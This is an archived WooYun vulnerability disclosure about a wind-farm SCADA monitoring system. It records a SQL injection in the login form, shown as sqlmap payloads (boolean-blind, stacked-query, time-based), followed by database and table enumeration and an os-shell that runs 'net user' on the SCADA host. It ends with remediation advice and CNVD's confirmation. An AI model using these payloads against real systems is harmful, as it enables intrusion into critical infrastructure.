乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-25: 细节已通知厂商并且等待厂商处理中 2015-12-29: 厂商已经确认,细节仅向厂商公开 2016-01-08: 细节向核心白帽子及相关领域专家公开 2016-01-18: 细节向普通白帽子公开 2016-01-28: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
整个风电场的监控
风电场群实时监控系统
**.**.**.**:88/
username处存在注入, PostgreSQL数据库,DBA权限,可执行os-shell
Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1' AND 8282=8282 AND 'VJwJ'='VJwJ&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44 Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1';SELECT PG_SLEEP(5)--&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44 Type: AND/OR time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1' AND 4478=(SELECT 4478 FROM PG_SLEEP(5)) AND 'DVAr'='DVAr&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: PostgreSQLavailable databases [9]:[*] "140212"[*] "140213"[*] "140214"[*] "140901"[*] "140903"[*] "140911"[*] information_schema[*] pg_catalog[*] public
Database: public[65 tables]+-----------------------------------+| calculatefieldinfo || fieldset || groupinfo || log || pathdescr || reportsqlconfig || stdpowercurve || tb_alarm_log || tb_alarmsetting || tb_command_log || tb_commandsending_histricalrecord || tb_commfault || tb_display_kind || tb_eq_kind || tb_equipment || tb_equipment1 || tb_equipment_success_time || tb_event_log || tb_fault_code || tb_fault_sms_setting || tb_group_equipment || tb_groups || tb_language || tb_menuitem || tb_path_descr || tb_permission || tb_permission2 || tb_preadapter || tb_procmd || tb_productionplan || tb_propaths || tb_propathsconfig || tb_propathsconfig1 || tb_protocol || tb_protocol_bak || tb_proxy_conf || tb_realtime_fault_stack || tb_report_set || tb_reportshowfield || tb_reporttemplate || tb_resources || tb_role || tb_role_menu || tb_role_user || tb_role_windfarm || tb_send_information || tb_synlog || tb_system_log || tb_tendata || tb_usbkey_blacklist || tb_user_config || tb_user_info || tb_user_service_config || tb_users || tb_userwebevent || tb_wf_vpn_ip_address || tb_windfarm || tb_windfarm_map_config || tb_wt_avail_algorithm_set || tb_wterrorinfo || tb_wtstatusinfo || tb_wttype || userloginlog || v_propaths || wooyun |竟然有一个名为wooyun的数据库!!!不过没有数据+-----------------------------------+
执行--os-shell服务器在内网
net user
command standard output: 'scada-01\postgres'command standard output:---\SCADA-01 µÄçջ§-------------------------------------------------------------------------------Administrator---command standard output: '¡'command standard output:---\SCADA-01 µÄçջ§-------------------------------------------------------------------------------Administrator---
这事一个大型的风电场群,总共包括两个风电场数百个风电设备
风电场信息
风场个数1装机容量(kW)48000 kW平均风速6.30 m/s有功功率4942 kW无功功率0 kVar当年发电量49786880 kWh(发电量挺大的)
修复SQL注入修改口令
危害等级:高
漏洞Rank:10
确认时间:2015-12-29 18:38
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无
